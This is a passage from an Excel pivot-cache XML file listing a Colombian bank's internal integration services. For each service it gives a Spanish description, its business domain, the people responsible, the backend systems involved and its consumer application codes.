    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Archivos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene varias funcionalidades, la primer es realizar la consulta del estado de un archivo enviado por un cliente para determinado convenio, la segunda permitirá realizar la visualización del detalle del archivo enviado por el cliente de los archivos (ejemplo: Novedades, Cobro y Facturación, Anulación, etc.), y la tercera funcionalidad es la de anulación de un lote (archivo) completo por parte del cliente, de los archivos (ejemplo: Novedades, Cobro y Facturación, Anulación, etc.)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_GDE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Bolsillos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El Servicio GestionDeBolsillos habilita las capacidades de gestión sobre los bolsillos de una cuenta de ahorros como, por ejemplo, crear o cancelar un bolsillo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Cuentas"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionDeCuentas permite efectuar diversas operaciones sobre las cuentas de un cliente en su relación con el Banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_NU0104001 _x000d__x000a_AW1128 _x000d__x000a_AW1108001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio Gestión De Cuentas Depósitos habilita las capacidades relacionadas con la gestión administrativa de una cuenta de depósito como, por ejemplo: la apertura, cancelación, el bloqueo o desbloqueo de saldos de una cuenta en particular y la validación de pertinencia entre un cliente y una cuenta"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW0360010 _x000d__x000a_NU0146001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0135001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permitirá realizar la compra y venta de divisas con unas validaciones previas, se realizará la productización con el fin de permitir el consumo desde cualquier canal. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Facturas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Facturas permitirá realizar gestión sobre sus facturas, podrá realizar la inscripción y la actualización."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0084001 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Pagos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Creación Pago permitirá la creación de un pago, proceso uno a uno. El pago deberá ser incluido al producto pagos como un lote, debe ser una cuenta origen Bancolombia y el destinatario podrá ser mismo banco u otros"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0153001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Topes Montos Clientes"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el día.   Para esto, el servicio permitirá consultar el monto límite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el día para poder determinar hasta que momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="SOA y APIs"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="NU0014001 _x000d__x000a_AW1300001 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1277001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion De Topes Montos Clientes"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite gestionar los topes que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el día.   Para esto, el servicio permitirá consultar el monto límite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco y permitirá tener un acumulado de las transacciones hechas por el cliente durante el día para poder determinar hasta que momento puede debitarse de sus cuentas."/>
    <s v="CANALES_DIGITALES"/>
    <s v="SOA y APIs"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="DEVELOPSOATEST _x000d__x000a_DEVELOPSOATESTMQ _x000d__x000a_AW0955001 _x000d__x000a_AW1277001 _x000d__x000a_NU0151001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Debito Automatico"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite a los diferentes canales de Bancolombia realizar la inscripción, consulta, modificación y eliminación del débito automático de una cuenta de ahorros, corriente o tarjeta de crédito."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="SCI _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Desembolso Credito Pyme"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestion Desembolso Credito Pyme, permite gestionar el proceso de desembolso que se encuentra orquestado por Bizagi, permitiendo la creación del desembolso, aceptación de una oferta y por ultimo aceptación del desembolso como tal."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Divisas tiene como objetivo realizar funcionalidades propias con las divisas como compra y venta de divisas o reversión de una compra o venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Divisas"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Divisas tiene como objetivo realizar funcionalidades propias con las divisas como compra y venta de divisas o reversión de una compra o venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Exoneraciones Tarjeta Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La necesidad de la creación surge de con la iniciativa de tener gestión sobre el concepto de exoneraciones. El servicio permite consultar, eliminar o grabar una exoneración en la tarjeta del cliente, operaciones aplicadas a las tarjetas débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Externa Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio presenta a los clientes consumidores un esquema de seguridad para acceder a los servicios de negocio del Banco asociados a Gestión Documental. Garantiza el firmado y cifrado de la información enviada e implementa mecanismos de filtrado a nivel de comunicaciones para autorizar a los proveedores integrales de servicio que lo consumen."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW1177 _x000d__x000a_AW1313001 _x000d__x000a_AW0638 _x000d__x000a_AW1128 _x000d__x000a_DataFile _x000d__x000a_Carvajal _x000d__x000a_AW1011 _x000d__x000a_AW1203001 _x000d__x000a_ISFID0023"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Facturas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Transacción encargada de realizar la inscripción de facturas , se valida si el usuario posee algún tipo de Conevnio para su activación directa, en caso de que el convenio maneje Delay se hara unas prevalidaciones de seguridad y quedara en estado pendiente, las facturas que quedaran activas las manejara Finacle. En la transacción se recibe el código del convenio, el documento, y datos necesarios para su ejecución."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Fondos Fiduciarios"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como objetivo ejecutar operaciones transaccionales de los fondos de inversión colectiva administrado por la fiduciaria tales como Adiciones, cancelaciones, retiros y constituciones para el producto de InvesBot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Fraude Crediticio"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionFraudeCrediticio es un apoyo a los procesos de validaciones de solicitudes crediticias, en el cual los consumidores podrán validar posibles indicios de fraude por parte del solicitante   de un producto en el proceso de originación u obtener alertas si el solicitante ya cometió un fraude en otra entidad financiera."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Garantias Banco FNG"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite la radicación del tipo de garantía Fondo Nacional de Garantías el cual previamente se tuvo que haber registrado en el FNG. Para posteriormente realizar su matricula en el Iseries del banco."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Garantias Fondo Nacional"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Fondo Nacional Garantías permite reservar y registrar una garantía en el Fondo Nacional. Para posteriormente asociarla a una obligación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1285001 _x000d__x000a_AW0856 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Giro Multicanal"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="GestionGiroMulticanal ofrece a sus consumidores la posibilidad de operar todo lo relacionado con los giros en los distintos canales ofrecidos por el banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Inclusión"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <s v="Monica Cecilia Gallego Rengifo"/>
    <m/>
    <s v="GIR-Giros Nacionales Multicanal_ISGIR001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion GMF"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio GestionGMF habilita las capacidades que permite agregar o eliminar el beneficio de Gravamen a los Movimientos Financieros (GMF) de cuentas de ahorro, corriente o de depósitos para un cliente en particular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Interna Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio presenta a los clientes consumidores un esquema de seguridad para acceder a los servicios de negocio del Banco asociados a Gestión Documental. Garantiza el firmado y cifrado de la información enviada e implementa mecanismos de filtrado a nivel de comunicaciones para autorizar a los proveedores integrales de servicio que lo consumen."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW1177 _x000d__x000a_NU0034001 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_AW0638 _x000d__x000a_AW1258002 _x000d__x000a_AW1133 _x000d__x000a_AW0659 _x000d__x000a_AW1315001 _x000d__x000a_AW1203001 _x000d__x000a_NU0015"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Inversiones"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite al cliente realizar la Activación, desactivación y Cancelación de una inversión virtual, en cualquier momento siempre y cuando la inversión virtual no se encuentre en periodo de gracia. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <m/>
    <s v="CDT _x000d__x000a_NU0014001 _x000d__x000a_SVE _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0153001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Leasing Financiero"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Leasing Financiero permitirá la creación de condiciones de Leasing financiero por activo de negocio.  Las condiciones de un leasing financiero incluyen la información del solicitante, el activo, montos, tasas, seguros, opción de compra, proveedor del activo, avalistas de la operación, entre otros."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="_x000a__x000a_LEASING_AW1171001"/>
    <s v="AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Limite"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite realizar la administración de los límites máximos de endeudamiento para una persona natural."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_AW0856 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Limite"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionLimite permite realizar la administración de los límites máximos de endeudamiento para una persona natural. Inicialmente, contará con la operación crearLimite pero el objetivo es que a futuro se agreguen nuevas operaciones que permitan consultar y eliminar un límite. Este servicio adoptará a nivel de desarrollo la nueva funcionalidad creada en bróker (ConsumerMediatorSTI) para habilitar rápidamente consumos sin necesidad de hacer un desarrollo completo."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1170 _x000d__x000a_AW1287 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Limites De Endeudamiento"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Versión Inicial del Servicio Gestión Limites de Endeudamiento de la EVC Ciclo de Crédito, que cuenta con la capacidad de fijar el limite global de Endeudamiento para un cliente, así como crear el sublímite de endeudamiento para una línea de crédito especifica."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_APICONNECT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Listas De Control"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene la capacidad de ingresar a un cliente en una categoría y subcategoría de listas de control. El cliente puede ser persona Natural o Jurídica. Este servicio no contempla el retiro de clientes de estas listas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1177 _x000d__x000a_NU0034001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Listas De Control"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá ingresar un usuario a una lista de control, eliminarlo de una lista o realizar estas mismas operaciones de forma masiva a través de la carga de un archivo. "/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1177 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Llave Cifrado"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite a los consumidores obtener la llave de cifrado con la cual se encriptan las credenciales de acceso (clave) de los clientes a los diferentes canales del banco."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW0955 _x000d__x000a_NU0051001 _x000d__x000a_AW0955001 _x000d__x000a_AW1185001 _x000d__x000a_AW1291001 _x000d__x000a_AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0034001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Notificaciones Push"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá la implementación de las nuevas capacidades requeridas para las aplicaciones que usarán el segundo factor de autenticación Push._x000a__x000a_El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="APIC _x000d__x000a_AW0856 _x000d__x000a_AW1071001 _x000d__x000a_NU0100001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Obligaciones Sufi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Obligaciones de Sufi permitirá a los consumidores ejecutar todo tipo de operaciones relacionadas con la administración de las obligaciones del cliente desde su originación hasta su desembolso, este servicio se hace para el contexto y todos los procesos de negocio de sufi. Este servicio tiene como primer consumidor APM, siendo el motor de decisión de sufi. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="AW1097001 _x000d__x000a_ISSU20003 _x000d__x000a_AW1134001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Ordenes"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Ordenes permitirá consultar las ordenes que tiene disponible el cliente para realizar negociación de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_NU0163001 _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Otp Pagos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite el reenvió de la OTP almacenada en el sistema de pagos al beneficiario, No se tendrá acceso al OTP y el servicio se encargara de enviar la notificación al backend para que este envié al numero de móvil que suministro el pagador al realizar la dispersión del archivo de pagos."/>
